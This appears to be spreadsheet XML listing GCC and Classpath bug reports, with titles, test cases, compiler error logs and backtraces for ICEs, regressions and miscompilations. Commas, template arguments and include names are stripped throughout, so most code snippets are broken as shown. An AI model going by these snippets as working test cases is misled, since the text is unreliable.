/Users/rnickb/proj/satyr/include/satyr/serial_for.h:40:6: internal compiler error: Abort trap: 6
g++: internal compiler error: Abort trap: 6 (program cc1plus)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-10351</t>
  </si>
  <si>
    <t>sparc-sun-solaris2.7 java testsuite failure in linking cxxtest</t>
  </si>
  <si>
    <t>As noted here:
http://gcc.gnu.org/ml/gcc-testresults/2003-04/msg00455.html
I'm getting a failure on sparc-sun-solaris2.7 with gcc-3.3 in linking cxxtest.
I previously described the problem here:
http://gcc.gnu.org/ml/java/2003-01/msg00356.html
Basically the compiler tries to link the test with -liconv and this library doesn't exist.  The iconv routine is in libc on solaris2.7.
I can't tell if the -liconv is coming from the testsuite or from the compiler itself.
Release:
gcc version 3.3 20030408 (prerelease)
Environment:
sparc-sun-solaris2.7
How-To-Repeat:
Run the java testsuite on solaris2.7.</t>
  </si>
  <si>
    <t>GCC-38918</t>
  </si>
  <si>
    <t>compile time error for DATA of NULL() to pointer structure component</t>
  </si>
  <si>
    <t>The following program gives a compile time error for a DATA assignment of NULL() to a structure component.  Probably related to 38917
Dick Hendrickson
      SUBROUTINE PF0009
! fails on Windows XP
! gcc version 4.4.0 20081219 (experimental) [trunk revision 142842] (GCC)
      TYPE  :: HAS_POINTER
        INTEGER POINTER            :: PTR_S
      END TYPE HAS_POINTER
      TYPE (HAS_POINTER)  ::  PTR_ARRAY(5)
      DATA PTR_ARRAY(1)%PTR_S  /NULL()/
      end subroutine pf0009
C:\gfortran&gt;gfortran try_pf0009.f
try_pf0009.f:11.38:
      DATA PTR_ARRAY(1)%PTR_S  /NULL()/
                                      1
Error: NULL appears on right-hand side in assignment at (1)</t>
  </si>
  <si>
    <t>dick.hendrickson</t>
  </si>
  <si>
    <t>GCC-44522</t>
  </si>
  <si>
    <t>improve diagnostic for :: vs : typo</t>
  </si>
  <si>
    <t>Testcase:
namespace x {
  struct a { }
}
x:a a2
x::a a3 = a2
gcc-4.6:
clang-9.C:5:1: error: â€˜xâ€™ does not name a type
clang-9.C:6:11: error: â€˜a2â€™ was not declared in this scope
clang:
t.cc:5:2: error: unexpected ':' in nested name specifier
x:a a2
 ^
 ::
In addition to getting the error message right (and suggesting a fixit replacement to ::) Clang knows what you mean so it handles the subsequent uses of a2 correctly. GCC in contrast gets confused about what the error is which leads it to emit bogus errors on every use of a2.</t>
  </si>
  <si>
    <t>manu</t>
  </si>
  <si>
    <t>GCC-62106</t>
  </si>
  <si>
    <t>[4.9/5 Regression] Adding a scalar variable to an array constructor gives wrong result</t>
  </si>
  <si>
    <t>The following code
program t
  integer :: ndim=2 ndfp=4 i
  print * (/ ( i i = 1 ndfp ) /) + ndim
end program t
gives 
           1           2           3           4
whereas it should be
           3           4           5           6
Note that both ndfp and ndim need to be variables not constants in order to generate the wrong result.</t>
  </si>
  <si>
    <t>m.a.hulsen</t>
  </si>
  <si>
    <t>GCC-16806</t>
  </si>
  <si>
    <t>[3.3 regression] Internal compiler error: Error reporting routines re-entered.</t>
  </si>
  <si>
    <t>I don't know what I'm doing with c++ and was trying to get something to compile
when I got an internal compiler error.  Clearly my code is wrong but still
shouldn't have an internal error.
I was trying to compile the following:
#include 
template class myclass {
public: 
        template int Get()
        template int Get() { return 1}
        template int Get() { return 2}
}
int main() {
        myclass c
        std::cerr  &lt;&lt; std::endl
        return 0
}       
g++ -Wall specnothing.cpp 
specnothing.cpp:6: error: parse error before `&gt;' token
specnothing.cpp:8: error: template-id `Get' in declaration of primary 
   template
specnothing.cpp:9: error: template-id `Get' in declaration of primary 
   template
specnothing.cpp: In instantiation of `myclass':
specnothing.cpp:13:   instantiated from here
specnothing.cpp:9: error: `template &gt; int myclass::Get() [with 
   T  = enumerator T = int]' and `template &gt; int 
   myclass::Get() [with T  = enumerator T = int]' cannot be 
   overloaded
specnothing.cpp: In function `int main()':
specnothing.cpp:14: error: no match for 'operator&lt;&lt;' in 'std::cerr &lt;&lt; 
Internal compiler error: Error reporting routines re-entered.
Please submit a full bug report
with preprocessed source if appropriate.
For Debian GNU/Linux specific bug reporting instructions see
.
g++ -v
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.4/specs
Configured with: ../src/configure -v
--enable-languages=cc++javaf77pascalobjcadatreelang --prefix=/usr
--mandir=/usr/share/man --infodir=/usr/share/info
--with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib
--enable-nls --without-included-gettext --enable-__cxa_atexit
--enable-clocale=gnu --enable-debug --enable-java-gc=boehm
--enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.4 (Debian 1:3.3.4-4)
uname -a
Linux doug 2.4.22 #2 SMP Sat Sep 27 20:15:00 PDT 2003 i686 GNU/Linux</t>
  </si>
  <si>
    <t>jurka</t>
  </si>
  <si>
    <t>GCC-5943</t>
  </si>
  <si>
    <t>incorrect Can't reassign a value to the final variable error</t>
  </si>
  <si>
    <t>I get incorrect Can't reassign a value to the final variable
error for following core. Sun Java 1.1 1.2 and 1.3 allows it.
//file: bug1.java
public abstract class bug1 {
    public static final String m_os_name = System.getProperty(os.name)
    public static final boolean m_unix_os
    static {
	String ntos = Windows NT
	if (m_os_name.equals(ntos)) {
	    m_unix_os = false
	} else {
	    m_unix_os = true
	}
    }
}
Here is the log:
shroff@bert&gt; gcj -v -C bug1.java
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/specs
Configured with: ../configure --with-as=/usr/local/bin/as --with-ld=/usr/local/bin/ld --enable-libgcj
Thread model: posix
gcc version 3.0.1
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/jc1 bug1.java -quiet -dumpbase bug1.java -g1 -version -fencoding=UTF-8 -fsyntax-only -femit-class-files -o /dev/null
GNU Java version 3.0.1 (sparc-sun-solaris2.8)
        compiled by GNU C version 3.0.1.
bug1.java: In class `bug1':
bug1.java: In method `()':
bug1.java:10: Can't reassign a value to the final variable `m_unix_os'.
            m_unix_os = true
               ^
1 error
Release:
GNU Java version 3.0.1 (sparc-sun-solaris2.8)
Environment:
Sun/Solaris
How-To-Repeat:
See the example in the report.</t>
  </si>
  <si>
    <t>shroff</t>
  </si>
  <si>
    <t>GCC-165</t>
  </si>
  <si>
    <t>Bug in g++ 2.95.2: Internal compiler error</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Mon 03 Apr 2000 14:46:04 -0500
 % uname -a
 Linux thumper 2.2.7-1.23smp #1 SMP Thu Jul 8 15:23:01 PDT 1999 i686 unknown
 % g++ --version
 2.95.2
 % g++ -c war.cpp
 war.cpp: In function `int main()':
 war.cpp:5: Internal compiler error 390.
 war.cpp:5: Please submit a full bug report.
 war.cpp:5: See  for instructions.
 [MvL: Preprocessor output removed]
Release:
2.95.2
How-To-Repeat:
#include 
#include 
int main() {
  cout &lt;&lt; count &lt;&lt; endl 
  return 0
}</t>
  </si>
  <si>
    <t>GCC-35093</t>
  </si>
  <si>
    <t>[4.3 Regression] gfortran.dg/data_constraints_1.f90</t>
  </si>
  <si>
    <t>With revision 132122 I got
bash-3.2$  /export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../gfortran -B/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../ /export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90   -O   -pedantic-errors -S  -m32 -o  foo.s
/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90:12.8:
  data n /0/            ! { dg-error Cannot change attributes }
       1
Error: Cannot change attributes of USE-associated symbol n at (1)
/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90:20.8:
  data l /42/           ! { dg-error conflicts with ALLOCATABLE }
       1
Error: DATA attribute conflicts with ALLOCATABLE attribute in 'l' at (1)
/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90:22.9:
  data q /1/            ! { dg-error Host associated variable }
        1
Error: Host associated variable 'q' may not be in the DATA statement at (1)
/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90:23.8:
  data m /1/            ! { dg-error conflicts with DUMMY attribute }
       1
Error: DATA attribute conflicts with DUMMY attribute in 'm' at (1)
/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90:24.10:
  data bar /99/         ! { dg-error conflicts with RESULT }
         1
Error: DATA attribute conflicts with RESULT attribute in 'bar' at (1)
/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90:28.13:
  data foobar /0/       ! { dg-error conflicts with FUNCTION }
            1
Error: DATA attribute conflicts with FUNCTION attribute in 'foobar' at (1)
/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/data_constraints_1.f90:21.8:
  data p(1) /1/         ! { dg-error non-constant array in DATA }
       1
Error: non-constant array in DATA statement (1)
*** glibc detected *** /export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951: double free or corruption (fasttop): 0x0000000000eeb770 ***
======= Backtrace: =========
/lib64/libc.so.6[0x3472c70412]
/lib64/libc.so.6(cfree+0x8c)[0x3472c73b1c]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x411cea]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x45dd29]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x45f72e]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x45f5b8]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x462d7d]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x453cf0]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x47e075]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951[0x63da75]
/lib64/libc.so.6(__libc_start_main+0xf4)[0x3472c1dab4]
/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../f951(calloc+0x1b9)[0x402d89]
======= Memory map: ========
00400000-00bd6000 r-xp 00000000 08:11 23330831                           /export/build/gnu/gcc/build-x86_64-linux/gcc/f951
00dd5000-00e42000 rw-p 007d5000 08:11 23330831                           /export/build/gnu/gcc/build-x86_64-linux/gcc/f951
00e42000-00efc000 rw-p 00e42000 00:00 0                                  [heap]
3472800000-347281a000 r-xp 00000000 08:05 11261190                       /lib64/ld-2.6.so
3472a1a000-3472a1b000 r--p 0001a000 08:05 11261190                       /lib64/ld-2.6.so
3472a1b000-3472a1c000 rw-p 0001b000 08:05 11261190                       /lib64/ld-2.6.so
3472c00000-3472d48000 r-xp 00000000 08:05 11261498                       /lib64/libc-2.6.so
3472d48000-3472f47000 ---p 00148000 08:05 11261498                       /lib64/libc-2.6.so
3472f47000-3472f4b000 r--p 00147000 08:05 11261498                       /lib64/libc-2.6.so
3472f4b000-3472f4c000 rw-p 0014b000 08:05 11261498                       /lib64/libc-2.6.so
3472f4c000-3472f51000 rw-p 3472f4c000 00:00 0 
3473400000-3473402000 r-xp 00000000 08:05 11261508                       /lib64/libdl-2.6.so
3473402000-3473602000 ---p 00002000 08:05 11261508                       /lib64/libdl-2.6.so
3473602000-3473603000 r--p 00002000 08:05 11261508                       /lib64/libdl-2.6.so
3473603000-3473604000 rw-p 00003000 08:05 11261508                       /lib64/libdl-2.6.so
3480600000-348060d000 r-xp 00000000 08:05 11261321                       /lib64/libgcc_s-4.1.2-20070925.so.1
348060d000-348080d000 ---p 0000d000 08:05 11261321                       /lib64/libgcc_s-4.1.2-20070925.so.1
348080d000-348080e000 rw-p 0000d000 08:05 11261321                       /lib64/libgcc_s-4.1.2-20070925.so.1
2aaaaaaab000-2aaaaaaad000 rw-p 2aaaaaaab000 00:00 0 
2aaaaaac9000-2aaaaaacb000 rw-p 2aaaaaac9000 00:00 0 
2aaaaaacb000-2aaaae8f5000 r--p 00000000 08:05 2817927                    /usr/lib/locale/locale-archive
2aaaae8f5000-2aaaaea28000 rw-p 2aaaae8f5000 00:00 0 
2aaaaea28000-2aaaaea2f000 r--s 00000000 08:05 3994609                    /usr/lib64/gconv/gconv-modules.cache
2aaab0000000-2aaab0021000 rw-p 2aaab0000000 00:00 0 
2aaab0021000-2aaab4000000 ---p 2aaab0021000 00:00 0 
7fff86e75000-7fff86e8a000 rw-p 7ffffffea000 00:00 0                      [stack]
7fff86ffd000-7fff87000000 r-xp 7fff86ffd000 00:00 0                      [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]
f951: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
bash-3.2$ 
Revision 132113 is bad and revision 132111 is OK.</t>
  </si>
  <si>
    <t>GCC-64657</t>
  </si>
  <si>
    <t>Support iterators with overloaded operator-comma</t>
  </si>
  <si>
    <t>It's not possible to use several libstdc++ algorithms with iterators that have overloaded comma operators due to expressions like:
  ++__beg ++__pos</t>
  </si>
  <si>
    <t>GCC-9861</t>
  </si>
  <si>
    <t>method name mangling ignores return type</t>
  </si>
  <si>
    <t>The following Generic Java code was compiled to the two classes which can be found in the attachment.
// TestGJ.java begins here
class Test {
  protected Type x () {
    return null
  }
}
public class TestGJ extends Test {
  protected Integer x () {
    return new Integer (1)
  }
  public static void main (final String[] argv) {
    new TestGJ ().x ().intValue ()
  }
}
// TestGJ.java ends here
If you execute java TestGJ (adjust CLASSPATH as necessary) the program runs without error (BTW there is no output).
But compilation of the class files with gcj fails because of a name clash during assembly.
Release:
gcc-3.2.1
Environment:
gentoo linux 1.4
gcc version 3.2.1 20021207 (Gentoo Linux 3.2.1-20021207)
GNU assembler version 2.13.90.0.18 (i586-pc-linux-gnu) using BFD version 2.13.90.0.18 20030121
How-To-Repeat:
If you execute
gcj -classpath /usr/share/gcc-data/i586-pc-linux-gnu/3.2/java/libgcj-3.2.1.jar:. Test.class TestGJ.class 
you should get output similar to
/tmp/cc5J7vu9.s: Assembler messages:
/tmp/cc5J7vu9.s:150: Error: symbol `_ZN6TestGJ1xEv' is already defined</t>
  </si>
  <si>
    <t>GCC-13841</t>
  </si>
  <si>
    <t>[3.4/4.0? regression] missing debug info for _Complex function arguments</t>
  </si>
  <si>
    <t>Today (23 Jan 2004) I changed the Xtensa port to define SPLIT_COMPLEX_ARGS so
that _Complex function arguments are split into separate real and imaginary
parts.  After that change I noticed that I couldn't see any _Complex arguments
from GDB.  The following input will demonstrate the problem:
_Complex int cmplx (_Complex int arg) { return arg }
int main (void) {
  _Complex int c = (12)
  c = cmplx(c)
  return 0
}
With the default of DWARF2 for this target the formal parameter TAG for arg
is produced but it has no AT_location entry.  If I use -gstabs there is no
.stabs entry at all for arg.
I'm not aware of anything specific to the Xtensa port that would cause this so
the same problem is likely to occur with other ports that define
SPLIT_COMPLEX_ARGS (currently alpha and rs6000/AIX).</t>
  </si>
  <si>
    <t>bob.wilson</t>
  </si>
  <si>
    <t>GCC-20873</t>
  </si>
  <si>
    <t>entry with alternate return in function</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
FUNCTION L(IJ)
 ENTRY M(I*)
END FUNCTION L
END</t>
  </si>
  <si>
    <t>GCC-59459</t>
  </si>
  <si>
    <t>MIPS target tests failing (gcc.target/mips/fpr-moves-7.c fpr-moves-8.c int-moves-1.c etc)</t>
  </si>
  <si>
    <t>Starting around December 2nd 2013 I noticed some new MIPS test failures.  These include 
gcc.target/mips/fpr-moves-7.c
gcc.target/mips/fpr-moves-8.c
gcc.target/mips/int-moves-1.c
and possibly some others.  Here is a cutdown test case based on fpr-moves-7.c
extern unsigned char gstuff[0x10000]
__attribute__((mips16)) long double
bar ()
{
  return *(long double *) (gstuff + 0x7fff)
}
And here is the failure it requires the -mabi=64 -mips64r2 -EL -msoft-float -fno-pic -msym32 flags.
I am not sure if this combination makes sense or not but GCC does not reject them.  If I take out -msoft-float or -fno-pic or -msym32 then the compiler does reject the option combination.  I think -msym32
forces the o64 ABI which technically supports mips16.
install-mips-mti-linux-gnu/bin/mips-mti-linux-gnu-gcc fpr-moves-7a.c -O0 '-mab
i=64' -mips64r2 -EL -msoft-float -fno-pic -msym32 -S -o fpr-moves-7.s
fpr-moves-7a.c: In function 'bar':
fpr-moves-7a.c:6:1: error: unrecognizable insn:
 }
 ^
(insn 8 7 9 2 (set (reg:DI 198)
        (unspec:DI [
                (mem/c:BLK (reg/f:DI 197) [0 MEM[(long double *)&amp;gstuff + 32767B
]+0 S8 A8])
                (mem/c:QI (plus:DI (reg/f:DI 197)
                        (const_int 7 [0x7])) [0 MEM[(long double *)&amp;gstuff + 327
67B]+7 S1 A8])
            ] UNSPEC_LOAD_LEFT)) fpr-moves-7a.c:5 -1
     (nil))
fpr-moves-7a.c:6:1: internal compiler error: in extract_insn at recog.c:2164
0x8f230a _fatal_insn(char const* rtx_def const* char const* int char const*)
	/local/home/sellcey/nightly/src/gcc/gcc/rtl-error.c:109
0x8f2339 _fatal_insn_not_found(rtx_def const* char const* int char const*)
	/local/home/sellcey/nightly/src/gcc/gcc/rtl-error.c:117
0x8bf663 extract_insn(rtx_def*)
	/local/home/sellcey/nightly/src/gcc/gcc/recog.c:2164
0x74b9f3 instantiate_virtual_regs_in_insn
	/local/home/sellcey/nightly/src/gcc/gcc/function.c:1555
0x74b9f3 instantiate_virtual_regs
	/local/home/sellcey/nightly/src/gcc/gcc/function.c:1921
0x74b9f3 execute
	/local/home/sellcey/nightly/src/gcc/gcc/function.c:1971
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-71640</t>
  </si>
  <si>
    <t>[7 Regression] include/c++/7.0.0/bits/hashtable.h:293:7: error: too many template parameters in template redeclaration</t>
  </si>
  <si>
    <t>clang complains:
In file included from /home/trippels/llvm/tools/llvm-config/llvm-config.cpp:32:
In file included from /home/trippels/gcc_test/usr/local/include/c++/7.0.0/unordered_set:47:
/home/trippels/gcc_test/usr/local/include/c++/7.0.0/bits/hashtable.h:293:7: error: too many template parameters in template redeclaration
      template&lt;typename _Keya typename _Valuea typename _Alloca
      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/home/trippels/gcc_test/usr/local/include/c++/7.0.0/bits/unordered_set.h:96:18: note: in instantiation of template class 'std::_Hashtable
      std::__cxx11::basic_string std::allocator &gt; std::__detail::_Identity std::equal_to &gt;
      std::hash std::__detail::_Mod_range_hashing std::__detail::_Default_ranged_hash std::__detail::_Prime_rehash_policy std::__detail::_Hashtable_traits&lt;true true
      true&gt; &gt;' requested here
      _Hashtable _M_h
                 ^
/home/trippels/llvm/tools/llvm-config/llvm-config.cpp:613:39: note: in instantiation of template class 'std::unordered_set std::hash
      std::equal_to &gt; std::allocator &gt; &gt;' requested here
      std::unordered_set FullDyLibComponents
                                      ^
/home/trippels/gcc_test/usr/local/include/c++/7.0.0/bits/hashtable_policy.h:905:3: note: previous template declaration is here
  template&lt;typename _Key typename _Value typename _Alloc
  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1 error generated.
hashtable_policy.h:
 905   template&lt;typename _Key typename _Value typename _Alloc                                                                                                                   
 906            typename _ExtractKey typename _Equal                                                                                                                             
 907            typename _H1 typename _H2 typename _Hash                                                                                                                        
 908            typename _RehashPolicy typename _Traits                                                                                                                          
 909            bool _Constant_iterators = _Traits::__constant_iterators::value&gt;                                                                                                   
 910     struct _Insert   
hashtable.h 
 293       template&lt;typename _Keya typename _Valuea typename _Alloca                                                                                                            
 294                typename _ExtractKeya typename _Equala                                                                                                                       
 295                typename _H1a typename _H2a typename _Hasha                                                                                                                 
 296                typename _RehashPolicya typename _Traitsa                                                                                                                    
 297                bool _Constant_iteratorsa bool _Unique_keysa&gt;                                                                                                                 
 298         friend struct __detail::_Insert  
Started with r236669.</t>
  </si>
  <si>
    <t>GCC-36064</t>
  </si>
  <si>
    <t>[4.4 Regression] could not split insn with -O1 -march=nocona -m32</t>
  </si>
  <si>
    <t>When the attached example is compiled by the
   gcc version 4.4.0 20080426 (experimental) (GCC)
using
------------
   gcc -O1 -march=nocona -m32 -c vorbisfile.c.c -o vorbisfile.o
------------
it produces the following error:
----------------
vorbisfile.c: In function 'ov_time_seek_page':
vorbisfile.c:1622: error: could not split insn
(insn 108 66 156 vorbisfile.c:1620 (parallel [
            (set (reg:DF 8 st)
                (float:DF (mem/c:DI (plus:SI (reg/f:SI 6 bp)
                            (const_int -40 [0xffffffffffffffd8])) [0 pcm_total+0 S8 A8])))
            (clobber (scratch:V4SI))
            (clobber (scratch:V4SI))
            (clobber (mem/c:DI (plus:SI (reg/f:SI 6 bp)
                        (const_int -24 [0xffffffffffffffe8])) [0 S8 A8]))
        ]) 235 {floatdidf2_i387_with_xmm} (nil))
vorbisfile.c:1622: internal compiler error: in final_scan_insn at final.c:2597
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
----------------
The same error is produced with -march=core2 -march=prescott or -march=pentium4. This error is not present when -m64 is used instead of -m32 or when any of the AMD architectures are used like -march=athlon64 and so on.</t>
  </si>
  <si>
    <t>martin.drab</t>
  </si>
  <si>
    <t>CLASSPATH-27172</t>
  </si>
  <si>
    <t>demonstration for NavigationFilter</t>
  </si>
  <si>
    <t>It would be nice to have a demonstration of the NavigationFilter in the Swing Activity board.</t>
  </si>
  <si>
    <t>GCC-47325</t>
  </si>
  <si>
    <t>FAIL: g++.dg/ext/pr47213.C (test for excess errors)</t>
  </si>
  <si>
    <t>Executing on host: /test/gnu/gcc/objdir/gcc/testsuite/g++/../../g++ -B/test/gnu/
gcc/objdir/gcc/testsuite/g++/../../ /test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/p
r47213.C  -nostdinc++ -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libstdc++-v3/
include/hppa2.0w-hp-hpux11.11 -I/test/gnu/gcc/objdir/hppa2.0w-hp-hpux11.11/libst
dc++-v3/include -I/test/gnu/gcc/gcc/libstdc++-v3/libsupc++ -I/test/gnu/gcc/gcc/l
ibstdc++-v3/include/backward -I/test/gnu/gcc/gcc/libstdc++-v3/testsuite/util -fm
essage-length=0  -fvisibility-ms-compat  -S  -o pr47213.s    (timeout = 300)
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C: In function 'void foo()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C:15:1: warning: visibility a
ttribute not supported in this configuration ignored [-Wattributes]
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C: In function 'void bar() [w
ith T = int()]':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C:9:1: warning: visibility at
tribute not supported in this configuration ignored [-Wattributes]
output is:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C: In function 'void foo()':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C:15:1: warning: visibility a
ttribute not supported in this configuration ignored [-Wattributes]
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C: In function 'void bar() [w
ith T = int()]':
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C:9:1: warning: visibility at
tribute not supported in this configuration ignored [-Wattributes]
FAIL: g++.dg/ext/pr47213.C (test for excess errors)
Excess errors:
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C:15:1: warning: visibility a
ttribute not supported in this configuration ignored [-Wattributes]
/test/gnu/gcc/gcc/gcc/testsuite/g++.dg/ext/pr47213.C:9:1: warning: visibility at
tribute not supported in this configuration ignored [-Wattributes]</t>
  </si>
  <si>
    <t>GCC-9230</t>
  </si>
  <si>
    <t>Friend functions defined within template class definitions are injected into the namespace scope at template instantiation time even if there is no declaration.</t>
  </si>
  <si>
    <t>I'm not sure about this one:
--------------------------
template  class X {
    friend void f () {}
}
void g() { f() }
--------------------------
This yields:
h.cc: In function `void g()':
h.cc:5: error: `f' undeclared (first use this function)
h.cc:5: error: (Each undeclared identifier is reported only once for each
   function it appears in.)
On the other hand this compiles cleanly:
--------------------------
template  class X {
    friend void f () {}
}
template class X
void g() { f() }
--------------------------
In other words the function f() is injected into the global
namespace only upon the first instantiation of the template
class X. Is this the way it is supposed to be?
W.
Release:
unknown
Environment:
all versions of gcc</t>
  </si>
  <si>
    <t>GCC-69397</t>
  </si>
  <si>
    <t>ICE on missing subprogram in generic interface</t>
  </si>
  <si>
    <t>$ cat z1.f90
program p
   interface f
      procedure f1
      !... more
   end interface
   integer allocatable :: z
   print * f(z)
contains
   integer function f2 (x)
      integer allocatable :: x
      f2 = 1
   end
end
$ gfortran-6.0.0 -c z1.f90
z1.f90:3:18:
       procedure f1
                  1
Error: Procedure 'f1' in generic interface 'f' at (1) is neither function nor subroutine
f951: internal compiler error: in gfc_arglist_matches_symbol at fortran/interface.c:3509
---
$ gfortran-5.3.1 -c z1.f90
...
(null):0: confused by earlier errors bailing out
$ gfortran-4.9.0 -c z1.f90
...
f951: internal compiler error: in gfc_arglist_matches_symbol at fortran/interface.c:3406</t>
  </si>
  <si>
    <t>GCC-48830</t>
  </si>
  <si>
    <t>[4.6 regression] unrecognized insn: storing invalid upper FP reg in SImode</t>
  </si>
  <si>
    <t>Created attachment 24148
preprocessed trivially reduced test-case
Most likely also 4.5 and 4.7 but I don't have a corresponding build tree handy.
Flagged as a regression because 4.3.5 builds it.
Anyway observe the following ICE with the attachment compiled with cc1 -fpreprocessed -mptr64 -mstack-bias -mlong-double-128 -m64 -mcpu=ultrasparc -mvis -O2 -o rc_stat.s rcs5.i (for 4.4.5):
 rc_stat_xsum_acc
Analyzing compilation unit
Performing interprocedural optimizations
       Assembling functions:
 rc_stat_xsum_acc
/home/hp/rcs5.i: In function 'rc_stat_xsum_acc':
/home/hp/rcs5.i:66: error: insn does not satisfy its constraints:
(insn 1288 208 218 11 /home/hp/rcs5.i:48 (set (mem/c:SI (plus:DI (reg/f:DI 30 %fp)
                (const_int 1915 [0x77b])) [149 %sfp+-132 S4 A32])
        (reg:SI 71 %f39 [+4 ])) 50 {*movsi_insn} (nil))
/home/hp/rcs5.i:66: internal compiler error: in reload_cse_simplify_operands at postreload.c:396
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-37882</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] Bitfield miscompilation</t>
  </si>
  <si>
    <t>struct S
{
  int a : 21
  unsigned char b : 3
} s
int
main ()
{
  s.b = 4
  if (s.b &gt; 0 &amp;&amp; s.b &lt; 4)
    __builtin_abort ()
  return 0
}
See http://gcc.gnu.org/ml/gcc-bugs/2008-10/msg01324.html
Works till 4.2 fails at -O with 4.3 and trunk.</t>
  </si>
  <si>
    <t>GCC-35163</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] folding comparison loses cast</t>
  </si>
  <si>
    <t>test.c:
...
int main() {
  signed char a = -30
  /* a == sE2 (-30 signed char) */
  signed char b = -31
  /* b == sE1 (-31 signed char) */
  int r = a &lt;= (unsigned short)b
  /* (unsigned short)b == uFFE1 (65505 unsigned short) */
  /*
    r 
      == 
    a &lt;= (unsigned short)b
      == 
    sE2 &lt;= uFFE1
      == arithmetic conversion rule integral promotion
    sFFFFFFE2 &lt;= s0000FFE1 
      == 
    -30 &lt;= 65505 
      == 
    1
  */
  /* gcc evaluates r to 0 instead */
  return r
}
...
The problem seems to occur during a call to fold-const.c:fold_widened_comparison() which calls tree.c:get_unwidened():
...
/* Return OP stripped of any conversions to wider types as much as is safe.
   Converting the value back to OP's type makes a value equivalent to OP.
   If FOR_TYPE is nonzero we return a value which if converted to
   type FOR_TYPE would be equivalent to converting OP to type FOR_TYPE.
   If FOR_TYPE is nonzero unaligned bit-field references may be changed to the
   narrowest type that can hold the value even if they don't exactly fit.
   Otherwise bit-field references are changed to a narrower type
   only if they can be fetched directly from memory in that type.
   OP must have integer real or enumeral type.  Pointers are not allowed!
   There are some cases where the obvious value we could return
   would regenerate to OP if converted to OP's type
   but would not extend like OP to wider types.
   If FOR_TYPE indicates such extension is contemplated we eschew such values.
   For example if OP is (unsigned short)(signed char)-1
   we avoid returning (signed char)-1 if FOR_TYPE is int
   even though extending that to an unsigned short would regenerate OP
   since the result of extending (signed char)-1 to (int)
   is different from (int) OP.  */
tree
get_unwidened (tree op tree for_type)
...
get_unwidened() is called with op == (int)(unsigned short)-31sc and for_type ==
signed char.
get unwidened() returns -31sc. However 'Converting the value back to OP's type
makes a value equivalent to OP' would mean convert (int)-31sc == (int)(unsigned
short)-31sc which is not correct: 
(int)-31sc == (int)(unsigned short)-31sc
(int)-31sc == (int)65505us
-31si == 65505si
FALSE</t>
  </si>
  <si>
    <t>tjvries</t>
  </si>
  <si>
    <t>GCC-36711</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/compat/struct-by-value-17a c_compat_* compile</t>
  </si>
  <si>
    <t>On i686-apple-darwin9 at revision 137407 I get:
FAIL: gcc.dg/compat/struct-by-value-17a c_compat_main_tst.o compile
FAIL: gcc.dg/compat/struct-by-value-17a c_compat_x_tst.o compile
FAIL: gcc.dg/compat/struct-by-value-17a c_compat_y_tst.o compile
The log shows:
...
